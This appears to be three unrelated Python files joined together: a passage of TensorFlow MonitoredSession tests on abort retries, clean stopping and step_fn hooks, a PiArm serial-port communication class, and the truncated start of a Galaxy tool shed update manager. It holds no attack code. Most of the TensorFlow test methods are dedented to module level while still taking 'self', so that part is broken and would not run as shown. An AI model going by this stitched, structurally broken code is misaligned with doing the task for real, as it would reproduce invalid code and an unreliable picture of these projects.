      # moves it to 1.
      self.assertEqual(1, session.run(do_step))
      self.assertFalse(session.should_stop())
      self.assertTrue(hook.raised)
      self.assertEqual(2, session.run(do_step))
      self.assertFalse(session.should_stop())
def test_retry_on_aborted_error(self):
  """AbortedError raised mid-training is silently retried."""
  self._retry_test(errors_impl.AbortedError(None, None, 'Abort'))
def test_retry_on_unavailable_error(self):
  """UnavailableError raised mid-training is silently retried."""
  self._retry_test(errors_impl.UnavailableError(None, None, 'Unavailable'))
def test_recover_and_retry_on_aborted_error(self):
  # Tests that we silently retry and recover on abort. This test uses
  # a CheckpointSaver to have something to recover from.
  logdir = _test_dir(self.get_temp_dir(),
                     'test_recover_and_retry_on_aborted_error')
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    scaffold = monitored_session.Scaffold()
    abort_hook = RaiseOnceAtCountN(
        4, errors_impl.AbortedError(None, None, 'Abort'))
    # Save after each step.
    ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
        logdir, save_steps=1, scaffold=scaffold)
    hooks = [abort_hook, ckpt_hook]
    with monitored_session.MonitoredSession(
        session_creator=monitored_session.ChiefSessionCreator(
            scaffold, checkpoint_dir=logdir),
        hooks=hooks) as session:
      self.assertEqual(0, session.run(gstep))
      self.assertEqual(1, session.run(do_step))
      self.assertEqual(2, session.run(do_step))
      self.assertFalse(session.should_stop())
      # Here at step 3, the hook triggers and raises AbortedError. The
      # MonitoredSession automatically restores and retries, so (unlike in
      # _retry_test) the step counter continues from the checkpoint.
      self.assertEqual(3, session.run(do_step))
      self.assertTrue(abort_hook.raised)
      self.assertFalse(session.should_stop())
      self.assertEqual(4, session.run(do_step))
      self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
  """OutOfRangeError ends the `with` block cleanly and sets should_stop."""
  # Tests that we stop cleanly when OutOfRange is raised.
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
                                                            'EOI'))
    session = monitored_session.MonitoredSession(hooks=[hook])
    # session should cleanly exit from the context.
    with session:
      self.assertEqual(0, session.run(gstep))
      self.assertFalse(session.should_stop())
      # Here at step 1, the hook triggers and raises OutOfRange. The
      # session should go into should_stop() mode. It should raise the
      # exception. So next step should not be executed.
      session.run(do_step)
      # `self.fail` replaces the old `assertTrue(False)`: both raise
      # AssertionError, but fail() documents intent and message.
      self.fail('An OutOfRangeError should have been raised by now.')
    self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
  """StopIteration ends the `with` block cleanly and sets should_stop."""
  # Tests that we stop cleanly when StopIteration is raised (the old
  # comment incorrectly said OutOfRange).
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    hook = RaiseOnceAtCountN(2, StopIteration)
    session = monitored_session.MonitoredSession(hooks=[hook])
    # session should cleanly exit from the context.
    with session:
      self.assertEqual(0, session.run(gstep))
      self.assertFalse(session.should_stop())
      # Here at step 1, the hook triggers and raises StopIteration. The
      # session should go into should_stop() mode. It should raise the
      # exception. So next step should not be executed.
      session.run(do_step)
      # `self.fail` replaces the old `assertTrue(False)`: both raise
      # AssertionError, but fail() documents intent and message.
      self.fail('A StopIteration should have been raised by now.')
    self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
  """Regular exceptions propagate out of the `with` block and stop it.

  Tests that regular exceptions just pass through a "with
  MonitoredSession" block and set the session in stop mode.
  """
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
    session = monitored_session.MonitoredSession(hooks=[hook])
    with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
      with session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
        # This triggers the hook and raises the exception
        session.run(do_step)
        # `self.fail` replaces the old `assertFalse(True)`: both raise
        # AssertionError, but fail() documents intent and message.
        self.fail('A RuntimeError should have been raised by now.')
    self.assertTrue(hook.raised)
    self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
  # Tests that regular exceptions reported to the coordinator from a thread
  # passes through a "run()" call within a "with MonitoredSession" block and
  # set the session in stop mode.
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    session = monitored_session.MonitoredSession()
    run_performed_without_error = False
    with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
      with session:
        self.assertEqual(0, session.run(gstep))
        # Report an exception through the coordinator.
        try:
          raise RuntimeError('a thread wants to stop')
        except RuntimeError as e:
          session._coordinated_creator.coord.request_stop(e)
        # Call run() which should perform normally. The reported
        # exception surfaces only when the `with` block exits.
        self.assertEqual(0, session.run(gstep))
        run_performed_without_error = True
    self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
  # Tests that regular exceptions reported to the coordinator from a thread
  # passes through returning from a "with MonitoredSession" block and
  # set the session in stop mode.
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    session = monitored_session.MonitoredSession()
    with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
      with session:
        self.assertEqual(0, session.run(gstep))
        # Report an exception through the coordinator.
        try:
          raise RuntimeError('a thread wants to stop')
        except RuntimeError as e:
          session._coordinated_creator.coord.request_stop(e)
        # should_stop() reflects the reported stop even before the
        # exception is re-raised on block exit.
        self.assertTrue(session.should_stop())
# This set of tests, verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.

def test_stop_cleanly_when_no_exception_in_with_body(self):
  # Tests that the session closes cleanly when the with-body exits normally
  # (no exception is involved here).
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    session = monitored_session.MonitoredSession()
    with session:
      self.assertEqual(1, session.run(do_step))
      self.assertEqual(2, session.run(do_step))
      self.assertFalse(session.should_stop())
    # Should have closed.
    self.assertTrue(session.should_stop())
    self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
  # Tests that regular exceptions in "with body" are seen outside.
  with ops.Graph().as_default():
    gstep = training_util.get_or_create_global_step()
    do_step = state_ops.assign_add(gstep, 1)
    session = monitored_session.MonitoredSession()
    # We should see that exception.
    with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
      with session:
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
        # Will be visible outside the "with body".
        raise RuntimeError('regular exception')
    # Should have closed despite the exception.
    self.assertTrue(session.should_stop())
    self.assertTrue(session._is_closed())
def test_graph(self):
  """MonitoredSession.graph exposes the default graph it was built under."""
  with ops.Graph().as_default() as expected_graph:
    with monitored_session.MonitoredSession() as session:
      self.assertEqual(expected_graph, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
  """The graph is finalized while the session is open and unfrozen after."""
  with ops.Graph().as_default() as graph:
    var = variables.VariableV1(0)
    with monitored_session.MonitoredSession() as session:
      self.assertEqual(0, session.run(var))
      # Inside the context the graph must be frozen...
      self.assertTrue(graph.finalized)
    # ...and unfrozen again once the session exits.
    self.assertFalse(graph.finalized)
def test_keep_finalized_graph_as_finalized(self):
  """A graph finalized before the session stays finalized after exit."""
  with ops.Graph().as_default() as g:
    a_var = variables.VariableV1(0)
    # Finalize the graph explicitly, before MonitoredSession does.
    monitored_session.Scaffold().finalize()
    with monitored_session.MonitoredSession() as session:
      self.assertEqual(0, session.run(a_var))
      self.assertTrue(g.finalized)
    # Unlike the unfinalized case, exit must NOT unfreeze the graph.
    self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
  """Test for rewriting RunOptions and observing RunMetadata with hooks."""
  with ops.Graph().as_default():
    my_const = constant_op.constant(42, name='my_const')
    _ = constant_op.constant(24, name='my_const_2')

    watch_a = debug_pb2.DebugTensorWatch(
        node_name='my_const',
        output_slot=0,
        debug_ops=['DebugIdentity'],
        debug_urls=[])
    hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a, False)
    watch_b = debug_pb2.DebugTensorWatch(
        node_name='my_const_2',
        output_slot=0,
        debug_ops=['DebugIdentity'],
        debug_urls=[])
    hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b, True)
    with monitored_session.MonitoredSession(
        hooks=[hook_a, hook_b]) as session:
      self.assertEqual(42, session.run(my_const))

      # trace_level=3 should have overridden trace_level=2;
      # timeout_in_ms=60000 should have overridden 30000;
      # output_partition_graphs=True should have overridden False.
      # The two debug tensor watches should have been merged.
      self.assertEqual([
          config_pb2.RunOptions(
              trace_level=3,
              timeout_in_ms=60000,
              output_partition_graphs=True,
              debug_options=debug_pb2.DebugOptions(
                  debug_tensor_watch_opts=[watch_a, watch_b]),
              report_tensor_allocations_upon_oom=True),
      ], hook_b.run_options_list)
      self.assertEqual(1, len(hook_b.run_metadata_list))
      # assertIsInstance gives a clearer failure message than
      # assertTrue(isinstance(...)).
      self.assertIsInstance(hook_b.run_metadata_list[0],
                            config_pb2.RunMetadata)
      self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
  """Test that RunOptions from caller and hooks can be merged properly."""
  with ops.Graph().as_default():
    my_const = constant_op.constant(42, name='my_const')
    _ = constant_op.constant(24, name='my_const_2')
    hook_watch = debug_pb2.DebugTensorWatch(
        node_name='my_const_2',
        output_slot=0,
        debug_ops=['DebugIdentity'],
        debug_urls=[])
    hook = RunOptionsMetadataHook(2, 60000, False, hook_watch, False)
    with monitored_session.MonitoredSession(hooks=[hook]) as session:
      caller_watch = debug_pb2.DebugTensorWatch(
          node_name='my_const',
          output_slot=0,
          debug_ops=['DebugIdentity'],
          debug_urls=[])
      caller_options = config_pb2.RunOptions(
          trace_level=3,
          timeout_in_ms=30000,
          output_partition_graphs=True,
          report_tensor_allocations_upon_oom=True)
      caller_options.debug_options.debug_tensor_watch_opts.extend(
          [caller_watch])
      self.assertEqual(42, session.run(my_const, options=caller_options))
      # trace_level=3 from the caller should override 2 from the hook.
      # timeout_in_ms=60000 from the hook should override from the caller.
      # output_partition_graph=True from the caller should override False
      # from the hook.
      # The two debug watches from the caller and the hook should be merged,
      # in that order.
      self.assertEqual([
          config_pb2.RunOptions(
              trace_level=3,
              timeout_in_ms=60000,
              output_partition_graphs=True,
              debug_options=debug_pb2.DebugOptions(
                  debug_tensor_watch_opts=[caller_watch, hook_watch]),
              report_tensor_allocations_upon_oom=True),
      ], hook.run_options_list)
      self.assertEqual(1, len(hook.run_metadata_list))
      self.assertTrue(
          isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
      self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
@test_util.run_deprecated_v1
def test_with_statement_and_close(self):
  """close() inside the with-block yields a clear 'already closed' error."""
  # Test case for https://github.com/tensorflow/tensorflow/issues/12224
  # where close() inside the with should have a better error message.
  with self.assertRaisesRegexp(RuntimeError, 'Session is already closed'):
    with monitored_session.MonitoredSession() as session:
      session.close()
def test_step_fn_example(self):
  """Basic run_step_fn usage: the step_fn's return value is passed through."""
  with ops.Graph().as_default():
    c = array_ops.placeholder(dtypes.float32)
    v = array_ops.identity(c)

    def step_fn(step_context):
      value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
      return value

    with monitored_session.MonitoredSession() as session:
      self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
def test_step_function_stops(self):
  """request_stop() inside a step_fn puts the session in stop mode."""
  with ops.Graph().as_default():

    def step_fn(step_context):
      step_context.request_stop()

    with monitored_session.MonitoredSession() as session:
      # run_step_fn returns None because the step_fn returned nothing.
      self.assertEqual(None, session.run_step_fn(step_fn))
      self.assertTrue(session.should_stop())
def test_step_request_stop_without_a_with_block(self):
  """Outside a with-block, request_stop() surfaces as StopIteration."""
  with ops.Graph().as_default():
    was_stop_iteration_raised = False

    def step_fn(step_context):
      step_context.request_stop()

    session = monitored_session.MonitoredSession()
    try:
      self.assertEqual(None, session.run_step_fn(step_fn))
    except StopIteration:
      was_stop_iteration_raised = True

    self.assertTrue(was_stop_iteration_raised)
    # Without the with-block machinery the session does not enter stop mode.
    self.assertFalse(session.should_stop())
def test_step_request_stop_in_a_loop(self):
  """request_stop() breaks out of a should_stop() loop via StopIteration."""
  with ops.Graph().as_default():

    def step_fn(step_context):
      step_context.request_stop()

    with monitored_session.MonitoredSession() as session:
      while not session.should_stop():
        _ = session.run_step_fn(step_fn)
        # The StopIteration raised by request_stop() is swallowed by the
        # with-block, so this line must never execute.
        self.fail('An exception should be raised on the line above.')
def test_step_request_stop_with_returning_a_type(self):
  """run_step_fn passes through arbitrary (non-tensor) return values."""
  with ops.Graph().as_default():

    def step_fn(step_context):
      del step_context
      return 'a type'

    with monitored_session.MonitoredSession() as session:
      self.assertEqual('a type', session.run_step_fn(step_fn))
def test_step_with_extra_arguments(self):
  """A step_fn with extra positional arguments is rejected with ValueError."""
  with ops.Graph().as_default():

    def step_fn(step_context, extra_foo):
      del step_context, extra_foo

    with monitored_session.MonitoredSession() as session:
      with self.assertRaisesRegexp(
          ValueError,
          '`step_fn` may either have one `step_context` argument'):
        self.assertEqual(None, session.run_step_fn(step_fn))
def test_step_fn_belongs_to_a_class(self):
  """A bound method works as a step_fn (its `self` is not counted)."""
  with ops.Graph().as_default():
    c = array_ops.placeholder(dtypes.float32)
    v = array_ops.identity(c)

    class Model(object):

      def step_fn(self, step_context):
        return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})

    with monitored_session.MonitoredSession() as session:
      model = Model()
      self.assertNear(3.2, session.run_step_fn(model.step_fn), 0.1)
def test_step_fn_belongs_to_a_class_and_has_extra_methods(self):
  """A bound method with extra arguments is rejected like a plain function."""
  with ops.Graph().as_default():

    class Model(object):

      def step_fn(self, step_context, extra_foo):
        del step_context, extra_foo

    with monitored_session.MonitoredSession() as session:
      with self.assertRaisesRegexp(
          ValueError,
          '`step_fn` may either have one `step_context` argument'):
        model = Model()
        self.assertEqual(None, session.run_step_fn(model.step_fn))
def test_step_fn_with_hooks(self):
  """Hooks fire around run_with_hooks() calls made inside a step_fn."""
  with ops.Graph().as_default():
    var = resource_variable_ops.ResourceVariable(0.0)

    # This test highlights the interaction of hooks with
    # `Monitoredsession.run_step_fn`. The order of execution of operations
    # below is:
    # 0. stage_0
    # 1. stage_1_0 or stage_1_1 in an undefined order
    # 2. stage_2
    stage_0 = state_ops.assign_add(var, 0.3)
    stage_1_0 = state_ops.assign_add(var, 0.7)
    # The order of `stage_1_0` and `stage_1_1` is undefined by
    # `MonitoredSession`, but we should be able to assert when both of them
    # are complete. To obtain a consistent result of adding two different
    # constants to `var`, we rely on a control dependency and
    # `ResourceVariable`. Otherwise, it is possible that one of the
    # additions overwrites the result of the other addition.
    with ops.control_dependencies([stage_1_0]):
      stage_1_1 = state_ops.assign_add(var, 0.5)
    stage_2 = state_ops.assign_add(var, 1.1)

    class Hook(session_run_hook.SessionRunHook):

      def __init__(self, testing):
        self._testing = testing

      def before_run(self, run_context):
        return session_run_hook.SessionRunArgs(fetches=stage_1_0)

      def after_run(self, run_context, run_values):
        self._testing.assertNear(0.3 + 0.5 + 0.7,
                                 run_context.session.run(var), 0.1)
        self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
                                 run_context.session.run(stage_2), 0.1)

    def step_fn(step_context):
      self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
      return step_context.run_with_hooks(fetches=stage_1_1)

    with monitored_session.MonitoredSession(hooks=[Hook(self)]) as session:
      self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_has_the_same_hooks_behavior_without_recovery(self):
  """SingularMonitoredSession runs hooks around step_fn the same way."""
  with ops.Graph().as_default():
    var = resource_variable_ops.ResourceVariable(0.0)

    # Same staging scheme as test_step_fn_with_hooks: a control dependency
    # makes the combined effect of stage_1_0/stage_1_1 deterministic.
    stage_0 = state_ops.assign_add(var, 0.3)
    stage_1_0 = state_ops.assign_add(var, 0.7)
    with ops.control_dependencies([stage_1_0]):
      stage_1_1 = state_ops.assign_add(var, 0.5)
    stage_2 = state_ops.assign_add(var, 1.1)

    class Hook(session_run_hook.SessionRunHook):

      def __init__(self, testing):
        self._testing = testing

      def before_run(self, run_context):
        return session_run_hook.SessionRunArgs(fetches=stage_1_0)

      def after_run(self, run_context, run_values):
        self._testing.assertNear(0.3 + 0.5 + 0.7,
                                 run_context.session.run(var), 0.1)
        self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
                                 run_context.session.run(stage_2), 0.1)

    def step_fn(step_context):
      self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
      return step_context.run_with_hooks(fetches=stage_1_1)

    with monitored_session.SingularMonitoredSession(
        hooks=[Hook(self)]) as session:
      self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_with_hooks_and_request_stop(self):
  """request_stop() inside a step_fn short-circuits hook execution."""
  with ops.Graph().as_default():
    trace_the_hook = {'before_run': False, 'after_run': False}

    class Hook(session_run_hook.SessionRunHook):

      def before_run(self, run_context):
        trace_the_hook['before_run'] = True

      def after_run(self, run_context, run_values):
        trace_the_hook['after_run'] = True

    def step_fn(step_context):
      step_context.request_stop()

    with monitored_session.MonitoredSession(hooks=[Hook()]) as session:
      self.assertEqual(None, session.run_step_fn(step_fn))
      self.assertTrue(session.should_stop())
      # `step_context.request_stop()` in a step_fn interrupts the flow of
      # running the hooks.
      self.assertFalse(trace_the_hook['before_run'])
      self.assertFalse(trace_the_hook['after_run'])
def test_recovers_from_an_exception_in_step_fn(self):
  """MonitoredSession retries the whole step_fn after AbortedError."""
  trace_the_exception = {'run_already': False}

  with ops.Graph().as_default():
    c = array_ops.placeholder(dtypes.float32)
    v = array_ops.identity(c)

    def step_fn(step_context):
      # Raise exactly once; the retry should then complete normally.
      if not trace_the_exception['run_already']:
        trace_the_exception['run_already'] = True
        raise errors_impl.AbortedError(None, None, 'Abort')
      return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})

    with monitored_session.MonitoredSession() as session:
      self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
    self.assertTrue(trace_the_exception['run_already'])
def test_recovers_from_an_exception_in_step_fn_after_hooks(self):
  """Recovery re-executes the entire step_fn body, including side effects."""
  trace_the_exception = {'run_already': False, 'side_effect_counter': 0}

  with ops.Graph().as_default():
    c = array_ops.placeholder(dtypes.float32)
    v = array_ops.identity(c)
    graph_state = variables.VariableV1(0.0)
    graph_side_effect = state_ops.assign_add(graph_state, 0.31)

    def step_fn(step_context):
      trace_the_exception['side_effect_counter'] += 1
      step_context.session.run(graph_side_effect)
      value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
      # Raise after the side effect so the retry runs the side effect twice.
      if not trace_the_exception['run_already']:
        trace_the_exception['run_already'] = True
        raise errors_impl.AbortedError(None, None, 'Abort')
      return value

    with self.cached_session() as test_session:
      with monitored_session.MonitoredSession(
          CountingSessionCreator(test_session)) as session:
        session.run(variables.global_variables_initializer())
        self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
        self.assertTrue(trace_the_exception['run_already'])
        # Make sure the rest of the body of the step_fn is re-executed upon
        # AbortedError:
        self.assertEqual(2, trace_the_exception['side_effect_counter'])
        self.assertNear(0.62, session.run(graph_state), 0.1)
def test_step_fn_doesnt_recover_when_it_wasnt_asked_to(self):
  """SingularMonitoredSession propagates AbortedError instead of retrying."""
  trace_the_exception = {'run_already': False}

  with ops.Graph().as_default():
    c = array_ops.placeholder(dtypes.float32)
    v = array_ops.identity(c)

    def step_fn(step_context):
      if not trace_the_exception['run_already']:
        trace_the_exception['run_already'] = True
        raise errors_impl.AbortedError(None, None, 'Abort')
      value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
      return value

    with monitored_session.SingularMonitoredSession() as session:
      with self.assertRaisesRegexp(errors_impl.AbortedError, 'Abort'):
        self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
        self.fail()

    self.assertTrue(trace_the_exception['run_already'])
def test_step_fn_exception_from_before_run(self):
  """An AbortedError raised by a hook's before_run also triggers a retry."""
  trace_the_exception = {'run_already': False, 'side_effect_counter': 0}

  with ops.Graph().as_default():
    c = array_ops.placeholder(dtypes.float32)
    v = array_ops.identity(c)
    vv = constant_op.constant(3.2)
    graph_state = variables.VariableV1(0.0)
    graph_side_effect = state_ops.assign_add(graph_state, 0.31)

    class Hook(session_run_hook.SessionRunHook):

      def __init__(self, testing):
        self._testing = testing

      def before_run(self, run_context):
        # Abort exactly once; subsequent runs proceed normally.
        if not trace_the_exception['run_already']:
          trace_the_exception['run_already'] = True
          raise errors_impl.AbortedError(None, None, 'Abort')
        return session_run_hook.SessionRunArgs(fetches=vv)

      def after_run(self, run_context, run_values):
        self._testing.assertNear(3.2, run_values.results, 0.1)

    def step_fn(step_context):
      trace_the_exception['side_effect_counter'] += 1
      step_context.session.run(graph_side_effect)
      return step_context.run_with_hooks(fetches=v, feed_dict={c: 1.3})

    with self.cached_session() as test_session:
      with monitored_session.MonitoredSession(
          CountingSessionCreator(test_session),
          hooks=[Hook(self)]) as session:
        test_session.run(variables.global_variables_initializer())
        self.assertNear(1.3, session.run_step_fn(step_fn), 0.1)
        # The step_fn body ran twice (original attempt + retry).
        self.assertEqual(2, trace_the_exception['side_effect_counter'])
        self.assertNear(0.62, session.run(graph_state), 0.1)
class SingularMonitoredSessionTest(test.TestCase):
  """Tests SingularMonitoredSession."""

  def test_handles_initialization(self):
    """SingularMonitoredSession initializes variables automatically."""
    with ops.Graph().as_default():
      a_var = variables.VariableV1(0)
      with monitored_session.SingularMonitoredSession() as session:
        # If it's not initialized, following statement raises an error.
        self.assertEqual(0, session.run(a_var))

  def test_do_not_handle_aborted_error(self):
    """Unlike MonitoredSession, AbortedError is not swallowed/retried."""
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()

      class _RaiseAbortedHook(session_run_hook.SessionRunHook):

        def before_run(self, run_context):
          raise errors_impl.AbortedError(None, None, 'Abort')

      with monitored_session.SingularMonitoredSession(
          hooks=[_RaiseAbortedHook()]) as session:
        with self.assertRaises(errors_impl.AbortedError):
          self.assertEqual(0, session.run(gstep))

      with self.assertRaises(errors_impl.AbortedError):
        with monitored_session.SingularMonitoredSession(
            hooks=[_RaiseAbortedHook()]) as session:
          self.assertEqual(0, session.run(gstep))

  def test_exit_cleanly_on_out_of_range_exception(self):
    # Tests that we stop cleanly when OutOfRange is raised.
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
                                                              'EOI'))
      session = monitored_session.SingularMonitoredSession(hooks=[hook])
      # session should cleanly exit from the context.
      with session:
        self.assertEqual(0, session.run(gstep))
        self.assertFalse(session.should_stop())
        # Here at step 1, the hook triggers and raises OutOfRange. The
        # session should go into should_stop() mode. It should raise the
        # exception. So next step should not be executed.
        session.run(do_step)
        self.assertTrue(False)
      self.assertTrue(session.should_stop())

  def test_regular_exception_reported_to_coord_pass_through_run(self):
    # Tests that regular exceptions reported to the coordinator from a thread
    # passes through a "run()" call within a "with MonitoredSession" block and
    # set the session in stop mode.
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      session = monitored_session.SingularMonitoredSession()
      run_performed_without_error = False
      with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
        with session:
          self.assertEqual(0, session.run(gstep))
          # Report an exception through the coordinator.
          try:
            raise RuntimeError('a thread wants to stop')
          except RuntimeError as e:
            session._coordinated_creator.coord.request_stop(e)
          # Call run() which should perform normally.
          self.assertEqual(0, session.run(gstep))
          run_performed_without_error = True
      self.assertTrue(run_performed_without_error)

  def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that regular exceptions pass through
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      session = monitored_session.SingularMonitoredSession()
      with session:
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
        self.assertFalse(session.should_stop())
      # Should have closed.
      self.assertTrue(session.should_stop())
      self.assertEqual(None, session.raw_session())

  def test_graph(self):
    """The session exposes the default graph it was created under."""
    with ops.Graph().as_default() as g:
      with monitored_session.SingularMonitoredSession() as session:
        self.assertEqual(g, session.graph)

  def test_raw_session(self):
    """raw_session() returns the underlying tf.Session object."""
    with ops.Graph().as_default():
      with monitored_session.SingularMonitoredSession() as session:
        self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
# Run the full test suite when this module is executed directly.
if __name__ == '__main__':
  test.main()
|
serial_comm.py | #!/usr/bin/python3
'''
This file handle serial read and write
'''
import serial
import logging
import threading
from tkinter import messagebox
class SerialComm(object):
    '''
    Low level serial operations.

    A background thread reads bytes off the port; a chunk is considered
    complete when a read times out after data was seen. Complete chunks are
    routed either to a caller blocked in write() (request/response) or are
    treated as unsolicited notifications.
    '''

    log = logging.getLogger('piarm.serial.SerialComm')

    # Default timeout for serial reading (seconds). __init__ replaces it with
    # a much shorter per-read timeout so the RX loop stays responsive.
    timeout = 5

    def __init__(self, handlerNotification=None, *args, **kwargs):
        # handlerNotification: optional callback for unsolicited data
        # (stored here; NOTE(review): not invoked anywhere in this class).
        self.alive = False
        self.timeout = 0.01
        self._dataRecieved = False       # True while a chunk is being assembled
        self._responseEvent = None       # set while a write() awaits a response
        self._expectResponse = None
        self._response = None
        self._rxData = []                # bytes of the chunk currently being read
        self._notification = []
        self._txLock = threading.Lock()  # serializes write()/response cycles
        self.handlerNotification = handlerNotification

    def connect(self, commPort, baud=115200):
        '''
        Open the comm port and start the background read thread.

        Returns True on success, False if the port could not be opened
        (an error dialog is shown in that case).
        '''
        try:
            self.serial = serial.Serial(
                port=commPort, baudrate=baud, timeout=self.timeout)
            self.alive = True
            self.rxThread = threading.Thread(target=self._readLoop)
            self.rxThread.daemon = True
            self.rxThread.start()
            return True
        except serial.serialutil.SerialException:
            messagebox.showerror("Port Error", "Couldn't Open Port..!!")
            return False

    def disconnect(self):
        '''
        Stops read thread, waits for it to exit cleanly and close serial port
        '''
        self.alive = False
        self.rxThread.join()
        self.serial.close()
        self.log.info('PiArm Disconnected Succesfully..!!')

    def _handleLineRead(self, line, checkResponse=True):
        '''
        Route a completed chunk: deliver it to a thread waiting in write(),
        otherwise record it as a notification.
        '''
        if self._responseEvent and not self._responseEvent.is_set():
            self._response = line
            if not checkResponse:
                # End of response reached; notify waiting thread
                self.log.debug('response: %s', self._response)
                self._responseEvent.set()
        else:
            # Nothing was waiting for this - treat it as notification
            self._notification.append(line)
            if self.serial.inWaiting() == 0:
                # No more chars for this notification
                self.log.debug('notification: Serial Device Connected')
                self._notification = []

    def _readLoop(self):
        '''
        Read thread main loop: accumulate single bytes; a timed-out read
        (b'') after data marks the end of a chunk.
        '''
        try:
            while self.alive:
                data = self.serial.read(1)
                if data != b'':
                    self._dataRecieved = True
                    self._rxData.append(data)
                elif self._dataRecieved:
                    self._dataRecieved = False
                    self._handleLineRead(self._rxData, checkResponse=False)
                    self._rxData = []
        except serial.SerialException:
            # Port disappeared (e.g. USB unplug): stop and best-effort close.
            self.alive = False
            try:
                self.serial.close()
            except Exception:
                pass

    def write(self, data, waitForResponse=True, timeout=1, byteCount=0):
        '''
        Write data to the serial port.

        When waitForResponse is True, block up to `timeout` seconds for the
        read thread to deliver a response; return the response, or None on
        timeout. When False, write and return immediately.
        '''
        with self._txLock:
            if not waitForResponse:
                self.serial.write(data)
                return None
            self._response = []
            self._responseEvent = threading.Event()
            self.serial.write(data)
            if self._responseEvent.wait(timeout):
                self._responseEvent = None
                self._expectResponse = False
                return self._response
            # Timed out waiting for a response; keep the historical
            # behavior of returning None, but make it visible in the log.
            self._responseEvent = None
            self._expectResponse = False
            self.log.warning('Timed out waiting for a serial response')
            return None
|
update_repository_manager.py | """
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import logging
import threading
import tool_shed.util.shed_util_common as suc
from tool_shed.util import common_util
from tool_shed.util import encoding_util
log = logging.getLogger( __name__ )
class UpdateRepositoryManager( object ):
    """
    Periodically polls each installed repository's tool shed for status
    information and keeps the repository's tool_shed_status column current.
    """

    # Keys produced by get_update_to_changeset_revision_and_ctx_rev() together
    # with the fallback values used when the tool shed cannot be reached.
    UPDATE_DICT_DEFAULTS = {
        'includes_data_managers': False,
        'includes_datatypes': False,
        'includes_tools': False,
        'includes_tools_for_display_in_tool_panel': False,
        'includes_tool_dependencies': False,
        'includes_workflows': False,
        'has_repository_dependencies': False,
        'has_repository_dependencies_only_if_compiling_contained_td': False,
        'changeset_revision': None,
        'ctx_rev': None,
    }

    def __init__( self, app ):
        self.app = app
        self.context = self.app.install_model.context
        # Ideally only one Galaxy server process should be able to check for repository updates.
        if self.app.config.enable_tool_shed_check:
            self.running = True
            self.sleeper = Sleeper()
            self.restarter = threading.Thread( target=self.__restarter )
            self.restarter.daemon = True
            self.restarter.start()
            self.seconds_to_sleep = int( app.config.hours_between_check * 3600 )

    def get_update_to_changeset_revision_and_ctx_rev( self, repository ):
        """Return the changeset revision hash to which the repository can be updated."""
        changeset_revision_dict = {}
        tool_shed_url = common_util.get_tool_shed_url_from_tool_shed_registry( self.app, str( repository.tool_shed ) )
